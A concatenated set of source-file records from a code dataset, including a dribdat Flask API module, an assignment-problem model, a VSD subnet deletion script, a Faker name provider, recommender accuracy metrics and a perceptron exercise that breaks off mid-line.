request.args.get('limit') or 10\n project = Project.query.filter_by(id=project_id).first_or_404()\n query = Activity.query.filter_by(project_id=project.id).order_by(\n Activity.id.desc()).limit(limit).all()\n activities = [a.data for a in query]\n return jsonify(project=project.data, activities=activities)\n\n\n@blueprint.route('/project//info.json')\ndef project_info_json(project_id):\n \"\"\" API: Outputs JSON info for a specific project \"\"\"\n project = Project.query.filter_by(id=project_id).first_or_404()\n activities = []\n for user in project.team():\n activities.append({\n 'id': user.id,\n 'name': user.username,\n 'link': user.webpage_url\n })\n\n data = {\n 'project': project.data,\n 'phase': project.phase,\n 'pitch': project.webembed,\n 'is_webembed': project.is_webembed,\n 'event': project.event.data,\n 'creator': {\n 'id': project.user.id,\n 'username': project.user.username\n },\n 'team': activities\n }\n\n return jsonify(data)\n\n# ------ USERS ----------\n\n\n@blueprint.route('/event//participants.csv')\n@admin_required\ndef event_participants_csv(event_id):\n event = Event.query.filter_by(id=event_id).first_or_404()\n userlist = [u.data for u in GetEventUsers(event)]\n headers = {\n 'Content-Disposition': 'attachment; '\n + 'filename=user_list_%d.csv' % event.id\n }\n return Response(stream_with_context(gen_csv(userlist)),\n mimetype='text/csv',\n headers=headers)\n\n\n# ------ SEARCH ---------\n\n@blueprint.route('/project/search.json')\ndef project_search_json():\n \"\"\" API: Full text search projects \"\"\"\n q = request.args.get('q')\n if q is None or len(q) < 3:\n return jsonify(projects=[])\n limit = request.args.get('limit') or 10\n q = \"%%%s%%\" % q\n projects = Project.query.filter(or_(\n Project.name.like(q),\n Project.summary.like(q),\n Project.longtext.like(q),\n Project.autotext.like(q),\n )).limit(limit).all()\n projects = expand_project_urls(\n [p.data for p in projects],\n request.host_url\n )\n return jsonify(projects=projects)\n\n# ------ UPDATE ---------\n\n\n@blueprint.route('/event/load/datapackage', methods=[\"GET\"])\n@admin_required\ndef event_load_datapackage():\n \"\"\" API: Loads event data from URL \"\"\"\n url = request.args.get('url')\n if not url or 'datapackage.json' not in url:\n return jsonify(status='Error', errors=['Missing datapackage.json url'])\n dry_run = True\n all_data = False\n status = \"Preview\"\n import_level = request.args.get('import')\n if import_level == 'basic':\n dry_run = False\n status = \"Basic\"\n if import_level == 'full':\n dry_run = False\n all_data = True\n status = \"Complete\"\n results = ImportEventByURL(url, dry_run, all_data)\n if 'errors' in results:\n return jsonify(status='Error', errors=results['errors'])\n return jsonify(status=status, results=results)\n\n\n@blueprint.route('/event/push/datapackage', methods=[\"PUT\", \"POST\"])\ndef event_push_datapackage():\n \"\"\" API: Pushes event data \"\"\"\n key = request.headers.get('key')\n if not key or key != current_app.config['SECRET_API']:\n return jsonify(status='Error', errors=['Invalid API key'])\n data = request.get_json(force=True)\n results = ImportEventPackage(data)\n if 'errors' in results:\n return jsonify(status='Error', errors=results['errors'])\n return jsonify(status='Complete', results=results)\n\n\n@blueprint.route('/project/push.json', methods=[\"PUT\", \"POST\"])\ndef project_push_json():\n \"\"\" API: Pushes data into a project \"\"\"\n data = request.get_json(force=True)\n if 'key' not in data or data['key'] != current_app.config['SECRET_API']:\n return jsonify(error='Invalid key')\n project = Project.query.filter_by(hashtag=data['hashtag']).first()\n if not project:\n project = Project()\n project.user_id = 1\n project.progress = 0\n # project.autotext_url = \"#bot\"\n # project.is_autoupdate = True\n project.event = Event.query.filter_by(is_current=True).first()\n elif project.user_id != 1 or project.is_hidden:\n return jsonify(error='Access denied')\n project.hashtag = data['hashtag']\n if 'name' in data and len(data['name']) > 0:\n project.name = data['name']\n else:\n project.name = project.hashtag.replace('-', ' ')\n if 'summary' in data and len(data['summary']) > 0:\n project.summary = data['summary']\n hasLongtext = 'longtext' in data and len(data['longtext']) > 0\n if hasLongtext:\n project.longtext = data['longtext']\n if 'autotext_url' in data and data['autotext_url'].startswith('http'):\n project.autotext_url = data['autotext_url']\n if not project.source_url or project.source_url == '':\n project.source_url = data['autotext_url']\n # MAX progress\n if 'levelup' in data and 0 < project.progress + data['levelup'] * 10 < 50:\n project.progress = project.progress + data['levelup'] * 10\n # return jsonify(data=data)\n if project.autotext_url is not None and not hasLongtext:\n # Now try to autosync\n project = AddProjectData(project)\n project.update()\n db.session.add(project)\n db.session.commit()\n return jsonify(success='Updated', project=project.data)\n\n# ------ FRONTEND -------\n\n\n@blueprint.route('/project/autofill', methods=['GET', 'POST'])\n@login_required\ndef project_autofill():\n \"\"\" API routine used to help sync project data \"\"\"\n url = request.args.get('url')\n data = GetProjectData(url)\n return jsonify(data)\n\n\n# TODO: move to separate upload.py ?\n\nACCEPTED_TYPES = ['png', 'jpg', 'jpeg', 'gif', 'json']\n\n\n@blueprint.route('/project/uploader', methods=[\"POST\"])\n@login_required\ndef project_uploader():\n \"\"\" API: Enables uploading images and files into a project \"\"\"\n if not current_app.config['S3_KEY']:\n return ''\n if len(request.files) == 0:\n return 'No files selected'\n img = request.files['file']\n if not img or img.filename == '':\n return 'No filename'\n ext = img.filename.split('.')[-1].lower()\n if ext not in ACCEPTED_TYPES:\n return 'Invalid format'\n filename = random_password(24) + '.' + ext\n # with tempfile.TemporaryDirectory() as tmpdir:\n # img.save(path.join(tmpdir, filename))\n if 'S3_FOLDER' in current_app.config:\n s3_filepath = '/'.join([current_app.config['S3_FOLDER'], filename])\n else:\n s3_filepath = filename\n # print('Uploading to %s' % s3_filepath)\n if 'S3_ENDPOINT' in current_app.config:\n s3_obj = boto3.client(\n service_name='s3',\n endpoint_url=current_app.config['S3_ENDPOINT'],\n aws_access_key_id=current_app.config['S3_KEY'],\n aws_secret_access_key=current_app.config['S3_SECRET'],\n )\n else:\n s3_obj = boto3.client(\n service_name='s3',\n region_name=current_app.config['S3_REGION'],\n aws_access_key_id=current_app.config['S3_KEY'],\n aws_secret_access_key=current_app.config['S3_SECRET'],\n )\n # Commence upload\n s3_obj.upload_fileobj(img,\n current_app.config['S3_BUCKET'],\n s3_filepath,\n ExtraArgs={'ContentType': img.content_type,\n 'ACL': 'public-read'}\n )\n return '/'.join([current_app.config['S3_HTTPS'], s3_filepath])\n\n\n# TODO: move to packager.py ?\n\n\n@blueprint.route('/event/current/datapackage.', methods=[\"GET\"])\n@login_required\ndef package_current_event(format):\n event = Event.query.filter_by(is_current=True).first() or \\\n Event.query.order_by(Event.id.desc()).first_or_404()\n return package_event(event, format)\n\n\n@blueprint.route('/event//datapackage.', methods=[\"GET\"])\n@login_required\ndef package_specific_event(event_id, format):\n event = Event.query.filter_by(id=event_id).first_or_404()\n return package_event(event, format)\n\n\ndef package_event(event, format):\n if format not in ['zip', 'json']:\n return \"Format not supported\"\n # Set up a data package\n package = Package(\n name='event-%d' % event.id,\n title=event.name,\n description=\"Event and project details collected with dribdat\",\n keywords=[\"dribdat\", \"hackathon\", \"co-creation\"],\n sources=[{\n \"title\": \"dribdat\", \"path\": \"https://dribdat.cc\"\n }],\n licenses=[{\n \"name\": \"ODC-PDDL-1.0\",\n \"path\": \"http://opendatacommons.org/licenses/pddl/\",\n \"title\": \"Open Data Commons Public Domain Dedication & License 1.0\"\n }],\n contributors=[{\n \"title\": current_user.username,\n \"path\": current_user.webpage_url or '',\n \"role\": \"author\"\n }],\n homepage=request.host_url,\n created=format_date(datetime.now(), '%Y-%m-%dT%H:%M'),\n version=\"0.1.0\",\n )\n\n # if False: # as CSV\n # fp_projects = tempfile.NamedTemporaryFile(\n # mode='w+t', prefix='projects-', suffix='.csv')\n # # print(\"Writing to temp CSV file\", fp_projects.name)\n # fp_projects.write(gen_csv(project_list(event.id)))\n # resource = Resource(fp_projects.name)\n # if False:\n # # print(\"Generating in-memory rowset\")\n # project_rows = gen_rows(project_list(event.id))\n # resource = Resource(\n # name='projects',\n # data=project_rows,\n # )\n\n # Generate resources\n # print(\"Generating in-memory JSON of event\")\n package.add_resource(Resource(\n name='events',\n data=[event.get_full_data()],\n ))\n # print(\"Generating in-memory JSON of projects\")\n package.add_resource(Resource(\n name='projects',\n data=project_list(event.id, True),\n ))\n if format == 'zip':\n # print(\"Generating in-memory JSON of participants\")\n package.add_resource(Resource(\n name='users',\n data=get_event_users(event),\n ))\n # print(\"Generating in-memory JSON of activities\")\n package.add_resource(Resource(\n name='activities',\n data=get_event_activities(event.id, 500),\n ))\n # print(\"Generating in-memory JSON of activities\")\n package.add_resource(Resource(\n name='categories',\n data=get_event_categories(event.id),\n ))\n # print(\"Adding supplementary README\")\n package.add_resource(Resource(\n name='readme',\n path='PACKAGE.txt',\n ))\n\n # Generate data package\n fp_package = tempfile.NamedTemporaryFile(\n prefix='datapackage-', suffix='.zip')\n # print(\"Saving at\", fp_package.name)\n if format == 'json':\n return jsonify(package)\n elif format == 'zip':\n package.to_zip(fp_package.name)\n return send_file(fp_package.name, as_attachment=True)\n","sub_path":"dribdat/public/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":17361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"302455016","text":"from __future__ import annotations\nfrom dataclasses import dataclass\nfrom typing import List\nimport numpy as np\nimport os\n\n@dataclass\nclass Assignment:\n '''\n Basic class to represent a solution to an assignment problem\n \n Attributes:\n -----------\n assigned_tasks: List[int]\n list with assigned tasks; \n assigned_tasks[2] == 1 means that worker with index 2 has been assigned to task 1\n value -1 means that the worked has no task assigned\n objective: int\n total cost of the assignment\n '''\n assigned_tasks: List[int]\n objective: int\n\n@dataclass\nclass AssignmentProblem:\n '''\n Basic class to represent an assignment problem\n \n Attributes:\n -----------\n name: string\n name of the problem\n costs: np.array\n cost array specific to the problem\n objective_is_min: bool \n whether we are looking to minimize costs or maximize profit\n\n Methods:\n --------\n n_tasks() -> int:\n number of tasks involved in the problem\n n_workers() -> int:\n number of workers involved in the problem\n\n Static Methods:\n ---------------\n from_file(path: str) -> AssignmentProblem:\n creates an instance based on the contents of a file at the given path;\n the format of the file is simple:\n\n \n \n \n ....\n \n '''\n name: str\n costs: np.array\n objective_is_min: bool \n \n\n def n_tasks(self):\n return self.costs.shape[1]\n\n def n_workers(self):\n return self.costs.shape[0]\n\n @staticmethod\n def from_file(path: str) -> AssignmentProblem:\n name = os.path.splitext(os.path.basename(path))[0]\n costs = None\n objective_min = True\n\n with open(path) as f:\n header = f.readline().split()\n objective_min = header[0] == \"min\"\n n_workers, n_tasks = tuple([int(v) for v in header[1:]])\n costs = np.zeros((n_workers, n_tasks), int)\n for (i,costs_row) in enumerate(f.readlines()):\n for (j, cost) in enumerate([int(v) for v in costs_row.split()]):\n costs[i,j] = cost\n return AssignmentProblem(name, costs, objective_min)\n\n@dataclass \nclass NormalizedAssignmentProblem:\n '''\n Basic class to represent an assignment problem with a min objective and square cost matrix.\n It can be created from the normal max non-square problem\n\n Attributes:\n -----------\n costs: np.array\n a sqaure cost array specific to the problem\n original_problem: AssignmentProblem \n the original problem that has been used to create the instance\n\n Methods:\n --------\n size() -> int:\n size of the problem (number of workers/tasks)\n\n Static Methods:\n ---------------\n from_problem(problem: AssignmentProblem) -> NormalizedAssignmentProblem:\n creates an instance based on the possibly non-square, non-min assignment problem\n ''' \n costs: np.Array\n original_problem: AssignmentProblem\n\n def size(self) -> int:\n return self.costs.shape[0]\n\n @staticmethod\n def from_problem(problem: AssignmentProblem) -> NormalizedAssignmentProblem:\n #TODO:\n # 1) create a square matrix capable to fit the orignal square matrix\n # 2) copy the original matrix into new one, inverting the costs if the original problem was a maximization problem\n # 3) extra rows and cols should always be filled with 0s\n # tip: inverting the costs means that you should subtract the original cost from the maximal cost in the matrix\n shape = problem.costs.shape\n max_size = np.max([shape[0], shape[1]])\n max_value = np.max(problem.costs)\n\n normalized_cost = np.zeros((max_size, max_size), dtype=np.int)\n\n for i in range(problem.costs.shape[0]):\n for j in range(problem.costs.shape[1]):\n if problem.objective_is_min:\n normalized_cost[i, j] = problem.costs[i, j]\n else:\n normalized_cost[i, j] = max_value - problem.costs[i, j]\n\n return NormalizedAssignmentProblem(normalized_cost, problem)\n","sub_path":"LAB_10/lab10_assignment_problem/saport/assignment/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"186914841","text":"# Copyright 2016 Nokia\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\nfrom vspk.v4_0 import NUVSDSession\nimport yaml\nimport sys\nimport argparse\n\n\ndef get_zone_obj(csp_user, org_name='Nuage_Partition1',\n l3_domain_name='oc-heat-test'):\n csproot = csp_user\n org = csproot.enterprises.get_first(filter=\"name=='%s'\" % org_name)\n if org.name != org_name:\n print(\"ERROR: Could not find %s org in VSD\" % org_name)\n sys.exit(1)\n l3_domain = org.domains.get_first(filter=\"name=='%s'\" % l3_domain_name)\n if l3_domain.name != l3_domain_name:\n print(\"ERROR: Could not find %s domain in VSD\" % l3_domain_name)\n sys.exit(1)\n zone = l3_domain.zones.get_first(filter=\"name=='%s'\"\n % vsd_constants['zone_name'])\n\n return (zone)\n\n\ndef delete_subnet(network_name, zone):\n network = zone.subnets.get_first(filter=\"name=='%s'\" % network_name)\n if network is None:\n print(\"%s network does not exist to delete\" % network_name)\n sys.exit(1)\n if network.name != network_name:\n print(\"ERROR: Could not delete %s network on VSD or network does\\\n not exist\" % network_name)\n sys.exit(1)\n network.delete()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"playbook_dir\", type=str,\n help=\"Path to playbook directory.\")\n parser.add_argument(\"subnet_name\", type=str, default=None,\n help=\"VSD subnet name to delete.\")\n args = parser.parse_args()\n\n # Get vsd related parameters\n try:\n with open(args.playbook_dir + '/roles/ci-predeploy/vars/main.yml',\n 'r') as fo:\n vsd_constants = yaml.load(fo)\n except Exception as e:\n print(\"ERROR: Could not locate file: %s\" % e)\n\n # Create a session as csp user\n try:\n session = NUVSDSession(**vsd_constants['csp'])\n session.start()\n csproot = session.user\n except:\n print(\"ERROR: Could not establish connection to VSD API\")\n sys.exit(1)\n\n # Get zone\n zone_obj = get_zone_obj(csproot, vsd_constants['org_name'],\n vsd_constants['domain_name'])\n\n # Delete subnet\n del_subnet_name = args.subnet_name\n delete_subnet(del_subnet_name, zone_obj)\n print(\"Deleted subnet %s from VSD\" % del_subnet_name)\n","sub_path":"scripts/delete_subnet.py","file_name":"delete_subnet.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"178904074","text":"# coding=utf-8\n\nfrom __future__ import unicode_literals\nfrom .. import Provider as PersonProvider\n\n\nclass Provider(PersonProvider):\n formats = (\n '{{first_name_male}} {{last_name}}',\n '{{first_name_male}} {{last_name}}',\n '{{first_name_male}} {{last_name}}',\n '{{first_name_male}} {{last_name}}',\n '{{first_name_female}} {{last_name}}',\n '{{first_name_female}} {{last_name}}',\n '{{first_name_female}} {{last_name}}',\n '{{first_name_female}} {{last_name}}',\n )\n\n first_names_male = (\n 'Carlos',\n 'Daniel',\n 'Eduardo',\n 'Angel',\n 'Jose',\n 'Diego',\n 'Jorge',\n 'Luis',\n 'Fernando',\n 'Alejandro',\n 'Sergio',\n 'Juan',\n 'Arturo',\n 'Christian',\n 'Jesus',\n 'David',\n 'Enrique',\n 'Isaac',\n 'Emmanuel',\n 'Ivan',\n 'Roberto',\n 'Cesar',\n 'Oscar',\n 'Alan',\n 'Edgar',\n 'Adrian',\n 'Juan Carlos',\n 'Alex',\n 'Antonio',\n 'Armando',\n 'Rafael',\n 'Alberto',\n 'Rodrigo',\n 'Alexis',\n 'Jonathan',\n 'Ricardo',\n 'Mauricio',\n 'José Luis',\n 'Erick',\n 'Hector',\n 'Andrès',\n 'Julio',\n 'Miguel',\n 'Leonardo',\n 'Victor',\n 'P.',\n 'Salvador',\n 'Ruben',\n 'K.',\n 'F.',\n 'Mario',\n 'Mariana',\n 'Luis Fernando',\n 'Brandon',\n 'Max',\n 'Joaquín',\n 'Humberto',\n 'Hibram',\n 'Cristian',\n 'Gerardo',\n 'B.',\n 'H.',\n 'R.',\n 'A.',\n\n\n\n )\n\n first_names_female = (\n 'Andrea',\n 'Fernanda',\n 'Diana',\n 'Daniela',\n 'Mariana',\n 'Ana',\n 'Alejandra',\n 'Maria',\n 'Karla',\n 'Adriana',\n 'Gabriela',\n 'Samantha',\n 'Brenda',\n 'Jazmin',\n 'Elizabeth',\n 'Rosa',\n 'Itzel',\n 'Melissa',\n 'Viridiana',\n 'Gaby',\n 'Laura',\n 'Jessica',\n 'Michelle',\n 'Paola',\n 'Esmeralda',\n 'Paula',\n 'Sara',\n 'Karen',\n 'Tania',\n 'Claudia',\n 'Frida',\n 'Miriam',\n 'Carolina',\n 'Estefania',\n 'Leticia',\n 'Dafne',\n 'Paulina',\n 'Perla',\n 'Alma',\n 'Cecilia',\n 'Fanny',\n 'Natalia',\n 'Valeria',\n 'Marian',\n 'Ximena',\n 'Karina',\n 'Lupita',\n 'Jennifer',\n 'Flor',\n 'Rocio',\n 'Denisse',\n 'Dulce',\n 'Yazmin',\n 'Alexa',\n 'Marisol',\n 'Ali',\n 'Alondra',\n 'Rebeca',\n 'Sandra',\n 'Marcela',\n 'Violeta',\n 'Clarisa',\n 'Victoria',\n 'Lizeth',\n\n\n\n\n )\n\n first_names = first_names_male + first_names_female\n\n last_names = (\n 'Garcia',\n 'Rodriguez',\n 'Martinez',\n 'Hernandez',\n 'Lopez',\n 'Gonzalez',\n 'Perez',\n 'Sanchez',\n 'Ramirez',\n 'Torres',\n 'Flores',\n 'Rivera',\n 'Gomez',\n 'Diaz',\n 'Reyes',\n 'Morales',\n 'Cruz',\n 'Ortiz',\n 'Gutierrez',\n 'Chavez',\n 'Ramos',\n 'Gonzales',\n 'Ruiz',\n 'Alvarez',\n 'Mendoza',\n 'Vasquez',\n 'Castillo',\n 'Jimenez',\n 'Moreno',\n 'Romero',\n 'Herrera',\n 'Medina',\n 'Aguilar',\n 'Garza',\n 'Castro',\n 'Vargas',\n 'Fernandez',\n 'Guzman',\n 'Munoz',\n 'Mendez',\n 'Salazar',\n 'Soto',\n 'Delgado',\n 'P.',\n 'Rios',\n 'Alvarado',\n 'Sandoval',\n 'C.',\n 'Valdez',\n 'Guerrero',\n 'Ortega',\n 'Estrada',\n 'Nunez',\n 'Maldonado',\n 'Vega',\n 'Vazquez',\n 'Santiago',\n 'Dominguez',\n 'Espinoza',\n 'Silva',\n 'R.',\n 'Marquez',\n 'Cortez',\n 'Rojas',\n\n\n\n\n )\n\n prefixes_male = (\n\n )\n prefixes_female = (\n\n )\n\n suffixes = ()\n","sub_path":"faker/providers/person/es_CO/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"451134588","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\nfrom collections import defaultdict\nimport numpy as np\nfrom six import iteritems\n\n\ndef rmse(predictions, verbose=True):\n \"\"\"Compute RMSE (Root Mean Squared Error).\n .. math::\n \\\\text{RMSE} = \\\\sqrt{\\\\frac{1}{|\\\\hat{R}|} \\\\sum_{\\\\hat{r}_{ui} \\in\n \\\\hat{R}}(r_{ui} - \\\\hat{r}_{ui})^2}.\n Args:\n predictions (:obj:`list` of :obj:`Prediction\\\n `):\n A list of predictions, as returned by the :meth:`test()\n ` method.\n verbose: If True, will print computed value. Default is ``True``.\n Returns:\n The Root Mean Squared Error of predictions.\n Raises:\n ValueError: When ``predictions`` is empty.\n \"\"\"\n\n if not predictions:\n raise ValueError('Prediction list is empty.')\n\n mse = np.mean([float((true_r - est)**2)\n for (_, _, true_r, est, _) in predictions])\n rmse_ = np.sqrt(mse)\n\n if verbose:\n print('RMSE: {0:1.4f}'.format(rmse_))\n\n return rmse_\n\n\ndef _rmspe_denom(y):\n \"\"\" Calculate denominator of rmspe consider 0 division.\n Attr\n --------------\n y np.array actual values's array\n\n Return\n --------------\n w np.array denom of rmspe\n \"\"\"\n\n w = np.zeros(y.shape, dtype=float)\n ind = y != 0\n w[ind] = 1. / (y[ind]**2)\n\n return w\n\n\ndef rmspe(predictions, verbose=True):\n \"\"\" Calcuate rmse and rmspe from surprise's result.\n Attr\n --------------\n pred prediction object of surprise\n\n Return\n --------------\n rmspe float\n \"\"\"\n # rmspe\n if not predictions:\n raise ValueError('Prediction list is empty.')\n\n # rmspe\n actuals = np.array([])\n predicts = np.array([])\n for uid, iid, true_r, est, _ in predictions:\n actuals = np.append(actuals, np.array([true_r]))\n predicts = np.append(predicts, np.array([est]))\n\n act_w = _rmspe_denom(actuals)\n rmspe = np.sqrt(np.mean(act_w * (actuals - predicts)**2))\n\n if verbose:\n print('RMSPE: {0:1.4f}'.format(rmspe))\n\n return rmspe\n\n\ndef mae(predictions, verbose=True):\n \"\"\"Compute MAE (Mean Absolute Error).\n .. math::\n \\\\text{MAE} = \\\\frac{1}{|\\\\hat{R}|} \\\\sum_{\\\\hat{r}_{ui} \\in\n \\\\hat{R}}|r_{ui} - \\\\hat{r}_{ui}|\n Args:\n predictions (:obj:`list` of :obj:`Prediction\\\n `):\n A list of predictions, as returned by the :meth:`test()\n ` method.\n verbose: If True, will print computed value. Default is ``True``.\n Returns:\n The Mean Absolute Error of predictions.\n Raises:\n ValueError: When ``predictions`` is empty.\n \"\"\"\n\n if not predictions:\n raise ValueError('Prediction list is empty.')\n\n mae_ = np.mean([float(abs(true_r - est))\n for (_, _, true_r, est, _) in predictions])\n\n if verbose:\n print('MAE: {0:1.4f}'.format(mae_))\n\n return mae_\n\n\ndef fcp(predictions, verbose=True):\n \"\"\"Compute FCP (Fraction of Concordant Pairs).\n Computed as described in paper `Collaborative Filtering on Ordinal User\n Feedback `_ by Koren\n and Sill, section 5.2.\n Args:\n predictions (:obj:`list` of :obj:`Prediction\\\n `):\n A list of predictions, as returned by the :meth:`test()\n ` method.\n verbose: If True, will print computed value. Default is ``True``.\n Returns:\n The Fraction of Concordant Pairs.\n Raises:\n ValueError: When ``predictions`` is empty.\n \"\"\"\n\n if not predictions:\n raise ValueError('Prediction list is empty.')\n\n predictions_u = defaultdict(list)\n nc_u = defaultdict(int)\n nd_u = defaultdict(int)\n\n for u0, _, r0, est, _ in predictions:\n predictions_u[u0].append((r0, est))\n\n for u0, preds in iteritems(predictions_u):\n for r0i, esti in preds:\n for r0j, estj in preds:\n if esti > estj and r0i > r0j:\n nc_u[u0] += 1\n if esti >= estj and r0i < r0j:\n nd_u[u0] += 1\n\n nc = np.mean(list(nc_u.values())) if nc_u else 0\n nd = np.mean(list(nd_u.values())) if nd_u else 0\n\n try:\n fcp = nc / (nc + nd)\n except ZeroDivisionError:\n raise ValueError('cannot compute fcp on this list of prediction. ' +\n 'Does every user have at least two predictions?')\n\n if verbose:\n print('FCP: {0:1.4f}'.format(fcp))\n\n return fcp\n","sub_path":"extentions/surprise/accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"465147645","text":"# -*- coding: utf-8 -*-\r\nimport csv\r\nimport os\r\nimport pandas as pd\r\nimport pandas\r\nfrom openpyxl import load_workbook\r\n\r\ndef Generator(fpath):\r\n xls = pd.read_excel(fpath,sheet_name='actual pre-code')\r\n xls.to_csv('./tools/Generator/csv/node.csv', index=False)\r\n\r\n with open('./tools/Generator/csv/node.csv', 'rb') as csvfile:\r\n reader = csv.reader(csvfile)\r\n next(reader)\r\n column = [row[1] for row in reader]\r\n\r\n for num,node in enumerate(column):\r\n with open('./tools/Generator/csv/node.csv', 'rb') as csvfile:\r\n reader = csv.DictReader(csvfile)\r\n for row in reader:\r\n if row['NODE Name'] == node:\r\n b = [row['Pre-code']]\r\n for element in b:\r\n parts = element.split(',')\r\n filen = './tools/Generator/plan/NODE %d.xlsx'%(num+1)\r\n wb = load_workbook(filename = filen)\r\n ws = wb['Case']\r\n for i,j in enumerate(parts):\r\n col = 'B%s'%(i+2)\r\n ws[col] = j\r\n wb.save(filen)","sub_path":"tools/Generator.py","file_name":"Generator.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"221666177","text":"# -- coding: utf-8 --\n\"\"\"\nCreated on Fri May 10 10:52:34 2019\n\n@author: דוד רגב\n\"\"\"\n\n# importing the libraries\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom numpy import argmax\n\ndef MinMaxNorm(data):\n data_max = np.max(data, axis=0)\n data_min = np.min(data, axis=0)\n\n lines = len(data)\n cols = len(data[0])\n\n for i in range(lines):\n for j in range(cols):\n if((data_max[j] - data_min[j])!=0):\n data[i][j] = (data[i][j] - data_min[j]) / (data_max[j] - data_min[j])\n\ndef zscor(data):\n data_mean = np.mean(data, axis=0)\n data_std = np.std(data, axis=0)\n\n lines = len(data)\n cols = len(data[0])\n\n for i in range(lines):\n for j in range(cols):\n if ((data_std[j]) != 0):\n data[i][j] = (data[i][j] - data_mean[j]) / (data_std[j])\n return data\ndef perc_learning(x_train, y_train, eta, num_iter):\n w = np.zeros((3, x_train.shape[1])) # TODO - how to get 3 generically\n for i in range(num_iter):\n #indexes = np.random.permutation(x_train.shape[0])\n #x_train, y_train = x_train[indexes], y_train[indexes]\n for x, y in zip(x_train, y_train):\n # for i in range(x_train.shape[0]):\n y_hat = np.argmax(np.dot(w, x))\n if y_hat != y:\n w[int(y), :] = w[int(y), :] + eta * x\n w[y_hat, :] = w[y_hat, :] - eta * x\n return w\n\n\ndef perc_test(x_test, y_test, w):\n count = 0\n for x, y in zip(x_test, y_test):\n y_pred = np.argmax(np.dot(w, x))\n if y_pred == y:\n count = count + 1\n return count\n\n\ndef perceptron(X, Y, eta, num_iter):\n success = []\n for i in range(10):\n # arrange the data\n x_train, y_train, x_test, y_test = split_data(X, Y, i)\n\n # teach the model\n w = perc_learning(x_train, y_train, eta, num_iter)\n # print(\"iter {}\".format(i), w)\n # check the model\n count = perc_test(x_test, y_test, w)\n perc = count / y_test.shape[0]\n success.append(perc)\n\n pred_perc = np.mean(success)\n pred_var = np.var(success)\n\n return pred_perc, pred_var\n\n\ndef preperation(X):\n X = encoder(X)\n #X = MinMaxNorm(X)\n X = np.array(X)\n return X\n\n\ndef split_data(X, Y, test):\n # X = X.rename_axis('ID')\n # X = X.values\n Y = Y.rename_axis('ID')\n Y = Y.values\n X_size = X.shape\n triningX = []\n testX = []\n for i in range(10):\n if i != test:\n for j in range(int((i * X_size[0]) / 10), int(((i + 1) * X_size[0]) / 10)):\n triningX.append(X[j])\n\n for j in range(int(test * X_size[0] / 10), int((test + 1) * X_size[0] / 10)):\n testX.append(X[j])\n\n Y_size = Y.shape\n triningY = []\n testY = []\n for i in range(10):\n if i != test:\n for j in range(int(i * Y_size[0] / 10), int((i + 1) * Y_size[0] / 10)):\n triningY.append(Y[j])\n\n for j in range(int(test * Y_size[0] / 10), int((test + 1) * Y_size[0] / 10)):\n testY.append(Y[j])\n\n triningX = np.array(triningX)\n testX = np.array(testX)\n triningY = np.array(triningY)\n testY = np.array(testY)\n\n return triningX, triningY, testX, testY\n\n\ndef encoder(X):\n # define universe of possible input values\n X = X.rename_axis('ID')\n X = X.values\n arrayGender = []\n matrix_size = X.shape\n ganderCol = -1\n\n for i in range(matrix_size[1]):\n\n if type(X[0][i]) == str:\n ganderCol = i\n break\n\n if (ganderCol == -1):\n return X\n\n for i in range(matrix_size[0]):\n if X[i][ganderCol] in arrayGender:\n continue\n arrayGender.append(X[i][ganderCol])\n\n arrayForReplaceGander = []\n new = []\n for i in range(matrix_size[0]):\n for j in range(len(arrayGender)):\n new.append(0)\n for j in range(ganderCol):\n new.append(X[i][j])\n for j in range(ganderCol + 1, matrix_size[1]):\n new.append(X[i][j])\n new.append(1)\n arrayForReplaceGander.append(new)\n new = []\n\n for i in range(matrix_size[0]):\n arrayForReplaceGander[i][arrayGender.index(X[i][ganderCol])] = 1\n\n return arrayForReplaceGander\n\n\ndef plot_grid(X, Y, Z, xlabel, ylabel, zlabel ):\n #Axes3D = Axes3D\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n\n surf = ax.plot_trisurf(X, Y, Z, cmap=plt.cm.RdYlGn, linewidth=0)\n fig.colorbar(surf)\n\n #ax.xaxis.set_major_locator(plt.ticker.MaxNLocator(5))\n #ax.yaxis.set_major_locator(plt.ticker.MaxNLocator(6))\n #ax.zaxis.set_major_locator(plt.ticker.MaxNLocator(5))\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.set_zlabel(zlabel)\n\n fig.tight_layout()\n\n plt.show()\n\n\ndef main():\n X = pd.read_csv('train_x.txt', sep=\",\", header=None)\n # X.columns = ['Sex', 'Length', 'Diameter', 'Height', 'Whole weight',\n # 'shucked weight', 'Viscera weight', 'shell weight']\n Y = pd.read_csv('train_y.txt', header=None)\n # Y.columns = ['Label']\n\n # prepare the data for learning (e.i. using one-hot encoder)\n X = preperation(X)\n\n array_eta = []\n array_iter = []\n array_pred_perc = []\n\n\n array_pred_var = []\n for num_iter in range(1, 20):\n #for i in range(1,10000,100):\n # eta = 0.0001*(10**i)\n eta = 10000000\n pred_perc, 